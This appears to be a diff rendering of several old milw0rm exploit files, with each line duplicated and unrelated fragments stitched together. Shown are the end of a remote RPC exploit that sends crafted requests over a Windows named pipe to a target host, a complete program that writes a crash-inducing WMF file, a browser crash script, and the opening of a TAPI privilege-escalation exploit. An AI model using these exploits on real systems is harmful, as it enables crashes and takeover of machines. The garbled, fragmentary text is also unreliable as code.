0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x00,0x00,0x00,0x08,0x00,0x00,0x01,0x00,0x00,0x00 0x00,0x00,0x00,0x08,0x00,0x00,0x01,0x00,0x00,0x00
}; };
int main(int argc, char* argv[]) int main(int argc, char* argv[])
{ {
char szServerName[MAX_PATH]; char szServerName[MAX_PATH];
char szPipe[MAX_PATH]; char szPipe[MAX_PATH];
HANDLE hFile; HANDLE hFile;
NETRESOURCE nr; NETRESOURCE nr;
if (argc < 2){ if (argc < 2){
printf("[-] Usage: %s <host>\n", argv[0]); printf("[-] Usage: %s <host>\n", argv[0]);
return -1; return -1;
} }
if ( strlen(argv[1]) > (MAX_PATH - 50) ) { if ( strlen(argv[1]) > (MAX_PATH - 50) ) {
printf("[-] Host name %s is too long !\n"); printf("[-] Host name %s is too long !\n");
return -1; return -1;
} }
printf("[+] Start connect host %s ... \n", argv[1]); printf("[+] Start connect host %s ... \n", argv[1]);
wsprintf( szServerName, "\\\\%s\\pipe", argv[1] ); wsprintf( szServerName, "\\\\%s\\pipe", argv[1] );
nr.dwType = RESOURCETYPE_ANY; nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL; nr.lpLocalName = NULL;
nr.lpRemoteName = szServerName; nr.lpRemoteName = szServerName;
nr.lpProvider = NULL; nr.lpProvider = NULL;
if ( WNetAddConnection2(&nr, "", "", 0) != NO_ERROR ) { if ( WNetAddConnection2(&nr, "", "", 0) != NO_ERROR ) {
printf("[-] Connect to host %s failed !\n", argv[1]); printf("[-] Connect to host %s failed !\n", argv[1]);
return -1; return -1;
} }
_snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser", argv[1]); _snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser", argv[1]);
hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL,
OPEN_EXISTING, 0, NULL); OPEN_EXISTING, 0, NULL);
if ( hFile == INVALID_HANDLE_VALUE ) { if ( hFile == INVALID_HANDLE_VALUE ) {
printf("[-] Open name pipe %s failed !\n", szPipe); printf("[-] Open name pipe %s failed !\n", szPipe);
return -1; return -1;
} }
unsigned char szOutBuffer[0X1000]; unsigned char szOutBuffer[0X1000];
unsigned long nBytesRead; unsigned long nBytesRead;
printf("[+] Start bind RPC interface ... \n"); printf("[+] Start bind RPC interface ... \n");
// bind rpc interface {8D9F4E40-A03D-11CE-8F69-08003E30051B} // bind rpc interface {8D9F4E40-A03D-11CE-8F69-08003E30051B}
if ( ! TransactNamedPipe(hFile, szBindString, sizeof(szBindString), if ( ! TransactNamedPipe(hFile, szBindString, sizeof(szBindString),
szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) { szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) {
printf("[-] TransactNamedPipe (Binding) failed !\n"); printf("[-] TransactNamedPipe (Binding) failed !\n");
CloseHandle(hFile); CloseHandle(hFile);
return -1; return -1;
} }
// send rpc request to call PNP_GetDeviceList (opnum 10) // send rpc request to call PNP_GetDeviceList (opnum 10)
printf("[+] Start send RPC request ... \n"); printf("[+] Start send RPC request ... \n");
if ( ! TransactNamedPipe(hFile, szRequestString, sizeof(szRequestString), if ( ! TransactNamedPipe(hFile, szRequestString, sizeof(szRequestString),
szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) { szOutBuffer, sizeof(szOutBuffer), &nBytesRead, NULL) ) {
printf("[-] TransactNamedPipe (Binding) failed !\n"); printf("[-] TransactNamedPipe (Binding) failed !\n");
CloseHandle(hFile); CloseHandle(hFile);
return -1; return -1;
} }
printf("[+] Attack host %s complete !\n", argv[1]); printf("[+] Attack host %s complete !\n", argv[1]);
return 0; return 0;
} }
// milw0rm.com [2005-10-21] // milw0rm.com [2005-10-21]


@ -1,111 +1,111 @@
/* /*
* Author: Winny Thomas * Author: Winny Thomas
* Pune, INDIA * Pune, INDIA
* *
* The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen * The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen
* when the field 'mtNoObjects' in the Metafile header is set to 0x0000. * when the field 'mtNoObjects' in the Metafile header is set to 0x0000.
* The code was tested on Windows 2000 server SP4. The issue does not occur with the * The code was tested on Windows 2000 server SP4. The issue does not occur with the
* hotfix for GDI (MS05-053) installed. * hotfix for GDI (MS05-053) installed.
* *
* Disclaimer: This code is for educational/testing purposes by authorized persons on * Disclaimer: This code is for educational/testing purposes by authorized persons on
* networks/systems setup for such a purpose. The author of this code shall not bear * networks/systems setup for such a purpose. The author of this code shall not bear
* any responsibility for any damage caused by using this code. * any responsibility for any damage caused by using this code.
* *
*/ */
#include <stdio.h> #include <stdio.h>
unsigned char wmfheader[] = unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03" "\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6" "\x00\x00\x00\x00\x66\xa6"
"\x01\x00" //mtType "\x01\x00" //mtType
"\x09\x00" //mtHeaderSize "\x09\x00" //mtHeaderSize
"\x00\x03" //mtVersion "\x00\x03" //mtVersion
"\xff\xff\xff\x7f" //mtSize "\xff\xff\xff\x7f" //mtSize
"\x00\x00" //mtNoObjects "\x00\x00" //mtNoObjects
"\xff\xff\xff\xff" //mtMaxRecord "\xff\xff\xff\xff" //mtMaxRecord
"\x00\x00"; "\x00\x00";
unsigned char metafileRECORD[] = unsigned char metafileRECORD[] =
"\x05\x00\x00\x00\x0b\x02\x39\x09\xc6\xfb\x05\x00\x00\x00\x0c\x02" "\x05\x00\x00\x00\x0b\x02\x39\x09\xc6\xfb\x05\x00\x00\x00\x0c\x02"
"\x91\xf9\xe4\x06\x04\x00\x00\x00\x06\x01\x01\x00\x07\x00\x00\x00" "\x91\xf9\xe4\x06\x04\x00\x00\x00\x06\x01\x01\x00\x07\x00\x00\x00"
"\xfc\x02\x00\x00\x0e\x0d\x0d\x00\x00\x00\x04\x00\x00\x00\x2d\x01" "\xfc\x02\x00\x00\x0e\x0d\x0d\x00\x00\x00\x04\x00\x00\x00\x2d\x01"
"\x00\x00\x08\x00\x00\x00\xfa\x02" "\x00\x00\x08\x00\x00\x00\xfa\x02"
"\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x04\x00\x00\x00\x2d\x01" "\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x04\x00\x00\x00\x2d\x01"
"\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03" "\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03"
"\x08\x00\xc6\xfb\xca\x02\xbc\xfe\xca\x02\x0f\x01\x49\x06\xa5\x02" "\x08\x00\xc6\xfb\xca\x02\xbc\xfe\xca\x02\x0f\x01\x49\x06\xa5\x02"
"\x49\x06\xf4\x00\x68\x08\xd5\xfc\x65\x06\x86\xfe\x65\x06\xc6\xfb" "\x49\x06\xf4\x00\x68\x08\xd5\xfc\x65\x06\x86\xfe\x65\x06\xc6\xfb"
"\xca\x02\x08\x00\x00\x00\xfa\x02\x00\x00\x00\x00\x00\x00\x00\x00" "\xca\x02\x08\x00\x00\x00\xfa\x02\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x04\x00\x00\x00\x2d\x01\x02\x00\x07\x00\x00\x00\xfc\x02" "\x00\x00\x04\x00\x00\x00\x2d\x01\x02\x00\x07\x00\x00\x00\xfc\x02"
"\x00\x00\xff\xff\xff\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x03\x00" "\x00\x00\xff\xff\xff\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x03\x00"
"\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00" "\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00"
"\xbd\x34\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00" "\xbd\x34\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00"
"\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00" "\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00"
"\x00\x00\x24\x03\x05\x00\xd5\xfc\x36\x07\xda\xfc\xd1\x06\x8b\xfe" "\x00\x00\x24\x03\x05\x00\xd5\xfc\x36\x07\xda\xfc\xd1\x06\x8b\xfe"
"\xd1\x06\x86\xfe\x36\x07\xd5\xfc\x36\x07\x04\x00\x00\x00\x2d\x01" "\xd1\x06\x86\xfe\x36\x07\xd5\xfc\x36\x07\x04\x00\x00\x00\x2d\x01"
"\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01" "\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01"
"\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34\x30\x00\x00\x00" "\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34\x30\x00\x00\x00"
"\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00" "\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00"
"\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00" "\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00"
"\xc6\xfb\x9b\x03\xcb\xfb\x36\x03\xc1\xfe\x36\x03\xbc\xfe\x9b\x03" "\xc6\xfb\x9b\x03\xcb\xfb\x36\x03\xc1\xfe\x36\x03\xbc\xfe\x9b\x03"
"\xc6\xfb\x9b\x03\x04\x00\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00" "\xc6\xfb\x9b\x03\x04\x00\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00"
"\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00" "\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00"
"\xfc\x02\x00\x00\xfb\x4e\x55\x00\x00\x00\x04\x00\x00\x00\x2d\x01" "\xfc\x02\x00\x00\xfb\x4e\x55\x00\x00\x00\x04\x00\x00\x00\x2d\x01"
"\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01" "\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01"
"\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00\xbc\xfe\x9b\x03\xc1\xfe" "\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00\xbc\xfe\x9b\x03\xc1\xfe"
"\x36\x03\x14\x01\xb5\x06\x0f\x01\x1a\x07\xbc\xfe\x9b\x03\x04\x00" "\x36\x03\x14\x01\xb5\x06\x0f\x01\x1a\x07\xbc\xfe\x9b\x03\x04\x00"
"\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00" "\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00"
"\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34" "\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34"
"\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00" "\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00"
"\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00" "\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00"
"\x24\x03\x05\x00\x0f\x01\x1a\x07\x14\x01\xb5\x06\xaa\x02\xb5\x06" "\x24\x03\x05\x00\x0f\x01\x1a\x07\x14\x01\xb5\x06\xaa\x02\xb5\x06"
"\xa5\x02\x1a\x07\x0f\x01\x1a\x07\x04\x00\x00\x00\x2d\x01\x02\x00" "\xa5\x02\x1a\x07\x0f\x01\x1a\x07\x04\x00\x00\x00\x2d\x01\x02\x00"
"\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00" "\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00"
"\x07\x00\x00\x00\xfc\x02\x00\x00\xfa\x94\x93\x00\x00\x00\x04\x00" "\x07\x00\x00\x00\xfc\x02\x00\x00\xfa\x94\x93\x00\x00\x00\x04\x00"
"\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00" "\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00"
"\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03\x08\x00\xc6\xfb" "\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03\x08\x00\xc6\xfb"
"\x9b\x03\xbc\xfe\x9b\x03\x0f\x01\x1a\x07\xa5\x02\x1a\x07\xf4\x00" "\x9b\x03\xbc\xfe\x9b\x03\x0f\x01\x1a\x07\xa5\x02\x1a\x07\xf4\x00"
"\x39\x09\xd5\xfc\x36\x07\x86\xfe\x36\x07\xc6\xfb\x9b\x03\x04\x00" "\x39\x09\xd5\xfc\x36\x07\x86\xfe\x36\x07\xc6\xfb\x9b\x03\x04\x00"
"\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00" "\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00"
"\x00\x00\xf0\x01\x00\x00\x03\x00"; "\x00\x00\xf0\x01\x00\x00\x03\x00";
unsigned char wmfeof[] = unsigned char wmfeof[] =
"\x00\x00\x00\x00"; "\x00\x00\x00\x00";
int main(int argc, char *argv[]) int main(int argc, char *argv[])
{ {
FILE *fp; FILE *fp;
int metafilesizeW, recordsizeW; int metafilesizeW, recordsizeW;
char wmfbuf[2048]; char wmfbuf[2048];
int metafilesize, recordsize, i, j; int metafilesize, recordsize, i, j;
metafilesize = sizeof (wmfheader) + sizeof (metafileRECORD) + sizeof(wmfeof) -3; metafilesize = sizeof (wmfheader) + sizeof (metafileRECORD) + sizeof(wmfeof) -3;
metafilesizeW = metafilesize/2; metafilesizeW = metafilesize/2;
recordsize = sizeof (metafileRECORD) -1; recordsize = sizeof (metafileRECORD) -1;
recordsizeW = recordsize/2; recordsizeW = recordsize/2;
memcpy((unsigned long *)&wmfheader[28], &metafilesize, 4); memcpy((unsigned long *)&wmfheader[28], &metafilesize, 4);
memcpy((unsigned long *)&wmfheader[34], &recordsizeW, 4); memcpy((unsigned long *)&wmfheader[34], &recordsizeW, 4);
printf("[*] Adding Metafile header\n"); printf("[*] Adding Metafile header\n");
for (i = 0; i < sizeof(wmfheader) -1; i++) { for (i = 0; i < sizeof(wmfheader) -1; i++) {
(unsigned char)wmfbuf[i] = (unsigned char)wmfheader[i]; (unsigned char)wmfbuf[i] = (unsigned char)wmfheader[i];
} }
printf("[*] Adding metafile records\n"); printf("[*] Adding metafile records\n");
for (j = i, i = 0; i < sizeof(metafileRECORD) -1; i++, j++) { for (j = i, i = 0; i < sizeof(metafileRECORD) -1; i++, j++) {
wmfbuf[j] = metafileRECORD[i]; wmfbuf[j] = metafileRECORD[i];
} }
printf("[*] Setting EOF\n"); printf("[*] Setting EOF\n");
for (i = 0; i < sizeof(wmfeof) -1; i++, j++) { for (i = 0; i < sizeof(wmfeof) -1; i++, j++) {
wmfbuf[j] = wmfeof[i]; wmfbuf[j] = wmfeof[i];
} }
printf("[*] Creating Metafile (MS053.wmf)\n"); printf("[*] Creating Metafile (MS053.wmf)\n");
fp = fopen("MS053.wmf", "wb"); fp = fopen("MS053.wmf", "wb");
fwrite(wmfbuf, 1, metafilesize, fp); fwrite(wmfbuf, 1, metafilesize, fp);
fclose(fp); fclose(fp);
} }
// milw0rm.com [2005-11-30] // milw0rm.com [2005-11-30]


@ -20,5 +20,5 @@
</del> </del>
</h2> </h2>
</dir> </dir>
</ul> </ul>
# milw0rm.com [2006-05-27] # milw0rm.com [2006-05-27]


@ -14,6 +14,6 @@
<SCRIPT> <SCRIPT>
try{window.open().document.appendChild(document.all[0]);}catch(e){} try{window.open().document.appendChild(document.all[0]);}catch(e){}
</SCRIPT> </SCRIPT>
# milw0rm.com [2005-04-12] # milw0rm.com [2005-04-12]


@ -139,6 +139,6 @@ void banner()
"\t\t Yuri Gushin <yuri@eclipse.org.il>\n" "\t\t Yuri Gushin <yuri@eclipse.org.il>\n"
"\t\t Alex Behar <alex@eclipse.org.il>\n" "\t\t Alex Behar <alex@eclipse.org.il>\n"
"\t\t\t ECL Team\n\n\n"); "\t\t\t ECL Team\n\n\n");
} }
// milw0rm.com [2005-04-17] // milw0rm.com [2005-04-17]


@ -1,315 +1,315 @@
// by Cesar Cerrudo - Argeniss - www.argeniss.com // by Cesar Cerrudo - Argeniss - www.argeniss.com
// //
// TAPI Vulnerability- MS05-040 // TAPI Vulnerability- MS05-040
// //
// Should work on Win2k sp0,sp1,sp2,sp3,sp4 any language // Should work on Win2k sp0,sp1,sp2,sp3,sp4 any language
// If Telephony Service is not running you can start it by net start "Telephony Service" // If Telephony Service is not running you can start it by net start "Telephony Service"
#include "windows.h" #include "windows.h"
#include "stdio.h" #include "stdio.h"
#include "tapi.h" #include "tapi.h"
typedef struct _UNICODE_STRING { typedef struct _UNICODE_STRING {
USHORT Length; USHORT Length;
USHORT MaximumLength; USHORT MaximumLength;
PWSTR Buffer; PWSTR Buffer;
} UNICODE_STRING; } UNICODE_STRING;
typedef struct LpcSectionMapInfo{ typedef struct LpcSectionMapInfo{
DWORD Length; DWORD Length;
DWORD SectionSize; DWORD SectionSize;
DWORD ServerBaseAddress; DWORD ServerBaseAddress;
} LPCSECTIONMAPINFO; } LPCSECTIONMAPINFO;
typedef struct LpcSectionInfo { typedef struct LpcSectionInfo {
DWORD Length; DWORD Length;
HANDLE SectionHandle; HANDLE SectionHandle;
DWORD Param1; DWORD Param1;
DWORD SectionSize; DWORD SectionSize;
DWORD ClientBaseAddress; DWORD ClientBaseAddress;
DWORD ServerBaseAddress; DWORD ServerBaseAddress;
} LPCSECTIONINFO; } LPCSECTIONINFO;
#define SHARED_SECTION_SIZE 0x1000 #define SHARED_SECTION_SIZE 0x1000
typedef struct _OBJDIR_INFORMATION { typedef struct _OBJDIR_INFORMATION {
UNICODE_STRING ObjectName; UNICODE_STRING ObjectName;
UNICODE_STRING ObjectTypeName; UNICODE_STRING ObjectTypeName;
BYTE Data[1]; BYTE Data[1];
} OBJDIR_INFORMATION; } OBJDIR_INFORMATION;
typedef struct _OBJECT_ATTRIBUTES { typedef struct _OBJECT_ATTRIBUTES {
ULONG Length; ULONG Length;
